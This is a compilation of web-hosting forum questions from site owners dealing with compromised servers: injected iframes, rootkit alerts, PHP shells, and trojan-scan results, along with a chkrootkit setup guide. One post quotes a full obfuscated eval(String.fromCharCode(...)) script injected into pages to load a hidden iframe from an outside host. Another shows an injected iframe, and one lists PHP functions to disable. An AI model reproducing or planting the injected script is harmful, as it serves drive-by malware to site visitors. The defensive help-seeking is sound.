Websites Infected With Trojan How To Solve?

Nov 16, 2008

I see my websites are infected with some trojan.

There are some iframe tags similar to this in all index files:

<iframe src="http://traff<<removed>>.cn/in.cgi?27" width=100 height=80></iframe>
Any idea how this iframe might have been inserted into my code?

I have tried to format my systems and remove all saved FTP passwords, but this virus is still coming back, and the strange thing is that I have websites on different servers infected with the same virus.
Any idea how this happened and how to avoid it?


Infected Web Pages

Jun 10, 2009

150 PHP pages are infected with code like.... As we do not have a backup, are there any commands to remove it?

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,11 8,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61 ,34,105,10 2,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115, 114,39,43, 39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32 ,119,105,1 00,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,1 17,110,99, 116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51 ,48,52,49, 56,50,52))</script>

Is there any command to search for and replace this whole string in the files? Normal sed does not seem to work with these symbols.


My Server Infected

Oct 26, 2007

It seems that my server is infected by this virus: Exploit.HTML.IESlice.h
It inserts iframe code into the index page and forwards visitors to another site.

My server is running CentOS 4.5 and WHM/cPanel. Which antivirus software do I need to use, or what other methods are there to eliminate this virus?


Bindshell INFECTED

Jan 15, 2007

Quote:

Searching for rootedoor... nothing found
Searching for anomalies in shell history files... Warning: `//root/.mysql_history' file size is zero
nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 465)
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found

Above is a part of the chkrootkit report I receive every day. Today it seems something is wrong, as bindshell is INFECTED. Any suggestions on what I should do in this case?


All Index Files Got Infected

Jun 12, 2007

A week after my server upgraded cPanel automatically, I got infected in all
index files, like index.html, index.php and index.asp and any index with any
extension, and this is the code in all the files:

Code:
<iframe src=[url]

And when I delete this code, it comes back again in all index files.

I am really in trouble with my clients, and I want to know how I can fix this
so that it never comes back again.


Checking `bindshell'... INFECTED (PORTS: 465)

Jul 29, 2007

I ran a CHKROOTKIT scan and found this:

Checking `bindshell'... INFECTED (PORTS: 465)


How To Solve The Following Error

Jan 12, 2007

I have a dedicated server, and it worked very well for all my sites and scripts until 2 weeks ago, when I started getting errors from my sites with the following error message: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution

I thought this was only a temporary error when I first encountered it, but it's been 2 weeks now and the problem is still showing continuously.

The problem caused my 2 sites to be penalized by the Google search engine.


Hacked By Aftehner How To Solve It

Apr 23, 2007

My server has been hacked by a user with the nick aftehner.

What he does exactly is get in and run a command through a PHP script that executes a shell command which deletes all the files that have index or main in their name, so he destroyed a lot of information.

My question is how can I reinstall everything on a remote server? I already tried to reinstall cPanel and Apache (but it doesn't work with the cPanel version, so I tried to install a standalone one, but it only shows 1 page for all domains hosted).

I don't know what I can do. It deleted a lot of information and replaced it with a file saying hacked by aftehner or something like that.

Yum doesn't work correctly. I already tried to reinstall Python, Perl and PHP, but I am still having problems. I have been working all day until 4 am for 3 days trying to fix it. I already know how he made the attack and I have all the logs; I can share this information with you so that you don't have this problem.

What do you recommend doing to solve this problem?

Server
Linux Fedora
Athlon XP 3800+
1 gb RAM
Data center: Layered tech
CPANEL / WHM

A domain hosted in it: Mindev.com
They hacked the website by the domain: Lodice.com


How To Solve A Mail Attack

Aug 30, 2007

How is it possible to solve this problem? My domain name has an e-mail address that is being forged and used by a spammer, and I get an incredible amount of bounced emails, to the point of bringing down a Dual-Xeon with 4GB of RAM. This e-mail account has been discontinued and e-mail sent to non-existent accounts is set to be thrown away. The average server load goes through the roof in a few seconds as soon as I point the MX entries to the server. I don't have the money to set up a load-balanced system. What could I do to host this domain name and use e-mail, only allowing emails to existing email accounts?


/usr Disk Space Is Running Out. How To Solve

Mar 5, 2008

My ISP gave me the box with only 8G allocated to /usr, and 6G is now used. I suppose that cPanel will take space when I create email accounts, forwarders, maybe other stuff too.

What can I do to prevent running out of space?


How To Solve Problems With Latest RPMs

Mar 12, 2007

I am trying to install some packages on my system and sometimes they depend on different, sometimes earlier, sometimes later versions of library packages on my system.

In that situation is it better to get the source for the package and recompile it with what you have on your system?

I am assuming that the dependent libraries the packages were compiled with were what was available on the package developer's system and do not necessarily contain new features lacking in the older versions.

Will recompiling such packages from the source RPMs fix the problems in most cases?

One particular group I persistently come across is the libcX.so libraries.


Joomla Install - Solve Directory Permission

Jun 28, 2009

I installed Joomla today, and it went smoothly except that under Help -> System Info in the Joomla admin panel, all "Directory Permissions" are "Unwritable."

I've read up on various solutions, such as installing suphp to take care of user permissions. But if I have my own Linux VPS and I am the only user (i.e. no one else has accounts on my VPS), what is the easiest way to fix this issue? Can I just chmod those directories to 777 without worrying about causing a security issue? Or is there a similarly easy solution for someone like me with very basic Linux knowledge?


Load Spikes Every Morning, Every 30 Minutes, Host Can't Solve

May 4, 2007

We've had a VPS for just over a month now. I am not going to mention the host by name (yet) but they advertise here and other people here reported liking them.

Sadly it's not my experience and I regret my purchase.

Every morning for the past few weeks, we get load spikes every 30 minutes that make our site unusable for a minute (on our VPS, any load over 1.0 is sluggish, over 2.0 is virtually unusable, over 3 is unresponsive)

Here's a series of days as an example:
[url]

The worst part about this is the host insists 1. either it's not happening or 2. they can't find it

I know it's happening because when I try to load a page on the half-hour, it takes over 13 seconds (less than 1 second normally). And it's fairly obvious it's someone doing a cron job with some nasty downloading, uploading, or maybe a massive mysql update.

Someone tell me what to tell them because this is driving me out of my mind. The load is NOT being caused by ourselves, I've made sure all our cron jobs don't happen on the exact half hour and we get lots of traffic later in the day without loads.


Plesk 12.x / Linux :: Auto Updater - Failed To Solve Dependencies

Mar 27, 2015

Last night the Plesk auto updater ran an update, and I was wondering if others have had the same issue.

CentOS6, RHEL5 x64 Plesk 12 Unlimited

Detecting installed product components.
Gathering information about installed license key...
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile

[Code] .....

ERROR: The Yum utility failed to install the required packages.
Attention! Your software might be inoperable.
Please, contact product technical support.


LKM Trojan?

Aug 20, 2007

I just installed a fresh copy of CentOS 4.5, updated some programs and installed chkrootkit. When I run # ./chkproc, it shows the following output:

# ./chkproc
You have 14 process hidden for readdir command
You have 14 process hidden for ps command

Searching for LKM trojans shows the following output:
# ./chkrootkit -x lkm

EXE 9994: /usr/sbin/named
CWD 9995: /var/named
EXE 9995: /usr/sbin/named
CWD 9996: /var/named
EXE 9996: /usr/sbin/named
CWD 9997: /var/named
EXE 9997: /usr/sbin/named
CWD 9998: /var/named
EXE 9998: /usr/sbin/named
CWD 26293: /var/lib/mysql
EXE 26293: /usr/sbin/mysqld
CWD 26294: /var/lib/mysql
EXE 26294: /usr/sbin/mysqld
CWD 26295: /var/lib/mysql
EXE 26295: /usr/sbin/mysqld
CWD 26296: /var/lib/mysql
EXE 26296: /usr/sbin/mysqld
CWD 26297: /var/lib/mysql
EXE 26297: /usr/sbin/mysqld
CWD 26298: /var/lib/mysql
EXE 26298: /usr/sbin/mysqld
CWD 26299: /var/lib/mysql
EXE 26299: /usr/sbin/mysqld
CWD 26300: /var/lib/mysql
EXE 26300: /usr/sbin/mysqld

When I stop mysql and named, and run # ./chkrootkit -x lkm again, it doesn't show anything. When I turn mysql and named back on, it starts complaining about compromises again.

Can it be a false alarm, or should I really be worried? What do you advise me to do now?


Trojan C99Shell

Jul 1, 2009

I just installed Zen Cart on my web hosting, and a few days later I saw some files written with names like core1405.php, and when I opened one to view it, it was actually the trojan c99shell.

I have deleted all of the core files. Now how can I prevent it from happening again? Because it is too much work to clean up the hosting server.


What To Use To Scan For Trojan?

Jun 2, 2009

We have a client claiming that she gets a Trojan warning when she tries to access her website, but using the Trojan scan in cPanel doesn't show anything.

What can we use to scan for a Trojan?


15 POSSIBLE Trojan Detected WHM

Aug 3, 2007

I have a site on my server; when I open it, Kaspersky Anti-Virus detects that there is a trojan in this site (see the picture in the attachment).

I checked the server from WHM and the result is 15 POSSIBLE Trojans Detected.

How can I solve this and remove these trojans?


Trojan :: 687 POSSIBLE Trojans?

Mar 21, 2008

I just ran a scan for trojan horses in WHM and it came up with "687 POSSIBLE Trojans". WTH? Are these real trojan horses? If so, how do I remove them?


PHP.Backdoor.Trojan

Apr 29, 2008

As usual, I do a monthly scan of all files on my sites. Today I downloaded all the site backups to my PC, then scanned them using Norton Antivirus, and in one site's files Norton detected PHP.Backdoor.Trojan.

I took a look at the file location and found the file, named xTgsj78Jn.txt.

Then I went to my server where the site is hosted, went to the directory and found the above file still there. I tried many times to delete it but always got the error message "Permission denied". I tried to change the permissions but it always returned an error.

When deleting it I used the command rm -r with root access; then I did ls -l and found the file details below.

-rwxrwxrwx 1 nobody nobody 137787 Mar 19 20:14 xTgsj78Jn.txt*

Please help me to delete this file.

FYI, this file was uploaded to my hosting file site.


Trojan :: How To Clean Server?

Aug 7, 2007

My WHM Trojan scanner found 23 possible Trojans.

How can I clean my server?


Trojan-Downloader.JS.Psyme.hz

Aug 12, 2007

I have a hosting account at OXEO.com and I have trojan problems on all my websites.

The index files of all my websites show a Trojan program called Trojan-Downloader.JS.Psyme.hz.

I checked my websites on Google, and Google is warning users about this kind of problem for one of my websites.

Has anybody here experienced the same problem?


Possible Trojan List By WHM - Do I Need To Worry?

Nov 8, 2007

I ran the Trojan scan in WHM and it came up with the list below. I have a strong feeling WHM is mis-reporting these as trojans, but I thought I would ask the experts here:

Scan for Trojan Horses

Appears Clean

/dev/stderr

Scanning for Trojan Horses.....

Possible Trojan - /usr/bin/cpan
Possible Trojan - /usr/bin/instmodsh
Possible Trojan - /usr/bin/prove
Possible Trojan - /usr/bin/xmlcatalog
Possible Trojan - /usr/bin/xmllint
Possible Trojan - /usr/bin/xml2-config
Possible Trojan - /usr/lib/libxml2.la
Possible Trojan - /usr/bin/mysqlhotcopy
Possible Trojan - /usr/bin/Wand-config
Possible Trojan - /usr/bin/animate
Possible Trojan - /usr/bin/compare
Possible Trojan - /usr/bin/composite
Possible Trojan - /usr/bin/conjure
Possible Trojan - /usr/bin/convert
Possible Trojan - /usr/bin/display
Possible Trojan - /usr/bin/identify
Possible Trojan - /usr/bin/import
Possible Trojan - /usr/bin/mogrify
Possible Trojan - /usr/bin/montage
Possible Trojan - /usr/bin/curl-config
Possible Trojan - /usr/bin/curl
Possible Trojan - /usr/lib/libcurl.so.3.0.0
Possible Trojan - /usr/lib/python2.3/site-packages/libxml2mod.la
Possible Trojan - /usr/lib/python2.3/site-packages/libxml2mod.so
Possible Trojan - /usr/sbin/pureauth
25 POSSIBLE Trojans Detected

Is there anything that looks fishy here?


How-to - Rootkit Scan (trojan Etc)

Jan 21, 2004

What is a rootkit? The following link is a very good read to answer that question.

http://linux.oreillynet.com/pub/a/li...4/rootkit.html

In summary, a rootkit is a trojan installed on your Linux server after someone has broken into it. These files are used to cover the hacker's tracks, and to give the hacker tools to do more dirty work from your server.

Usage:

1. su - (change to root user)
2. mkdir /usr/local/chkrootkit
3. wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
4. tar -xvzf chkrootkit.tar.gz
5. cd chkrootkit*
6. cp * /usr/local/chkrootkit
7. cd /usr/local/chkrootkit
8. make sense

Now scan your system:

1. cd /usr/local/chkrootkit
2. ./chkrootkit

chkrootkit may from time to time give false positives. If you ever get a positive or "infected hit", scan a second time. If you do get a positive hit, google the hit to research the issue and the steps to correct it.

Part 2 - automated chkrootkit, and emailed results.

I'm lazy, and like my server to do the work for me so I have it scan every day, and email me the results.

Usage:

1. vi /etc/cron.daily/chkrootkit
2. add the following code.

Code:
#!/bin/bash
(cd /usr/local/chkrootkit; ./chkrootkit -q 2>&1 | mail -s "Daily chkrootkit scan" you@yourdomain.com)
3. chmod 0755 /etc/cron.daily/chkrootkit

This will email you@yourdomain.com every morning with your chkrootkit results. The -q option will only show you exploits.

Removal:

If you don't like getting the emails or just want to remove this from your server:

1. rm /etc/cron.daily/chkrootkit
2. rm -rf /usr/local/chkrootkit

All files will now be deleted from your server.


How To Remove Virus/Trojan

Dec 7, 2008

How can I remove a virus/Trojan from my website?


Trojan-Downloader.JS.Psyme.hz Remover

Aug 3, 2007

Can anybody help me with a remover for Trojan-Downloader.JS.Psyme.hz?

I can't find a remover for this trojan for a Linux server.


Trojan-Clicker.HTML.IFrame.amh

Nov 6, 2009

I am not that technically proficient so I have to resort to shared hosting solutions...I am currently with Bluehost.

Problem: I have a small site with minimal needs in terms of storage and bandwidth, but the site is controversial and gets hacked and attacked a lot.

I need a shared hosting provider which ranks higher than most in terms of security.

Recently the site was attacked such that any user going to the site was infected with Trojan horse viruses.

Dunno if it's useful or not, but here are the files from my PC antivirus, which was infected when I went to the site with IE:



Trojan-Clicker.HTML.Iframe.g In My Website? What Is This??

Sep 4, 2007

I have a website and everything works fine, but a user who uses Kaspersky told me my website has a trojan. I don't understand how this is possible, and I'm really worried.

The trojan that appears for my user is:

Trojan-Clicker.HTML.Iframe.g

Does someone know why I have this trojan?

Now the users refuse to open my website!! I'm more than worried.

This is a printscreen of the error: ...


Trojan Detected On Initial Load Of Site

Jan 8, 2008

I have 2 reseller accounts with one provider, and in the last several days I have noticed that when you visit the site for the first time, my AV software detects a trojan on the site, but the code & html files are 100% clean!

I'm suspecting that there is something being injected into the scripts from the server daemons that's either running or something else.

Anyone have any suggestions?


Prevent Of Execution Trojan Shell Scripts, Like R57shell And Other?

Oct 27, 2006

Which configuration for PHP and the server prevents executing shell scripts?

Which functions do you recommend disabling?

Like shell_exec, passthru, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, exec, system, suexec, popen, pclose, dl, ini_set, virtual, set_time_limit


/tmp/clamav-77e7bfdbb2d3872b/test2.exe: Trojan.Taskkill.A FOUND

Jun 11, 2007

What is the meaning of the following lines in the temp folder? When I check the /tmp folder daily,
many /tmp/clamav entries are present on the mail server, and they occupy a large amount of space in the temp folder.

/tmp/clamav-77e7bfdbb2d3872b/test1.exe: Worm.Mydoom.U FOUND

/tmp/clamav-77e7bfdbb2d3872b/test2.exe: Trojan.Taskkill.A FOUND

/tmp/clamav-77e7bfdbb2d3872b/test3.exe: Worm.Nyxem.D FOUND

/tmp/malware.zip: Infected.Archive FOUND








Copyrights 2005-15 www.BigResource.com, All rights reserved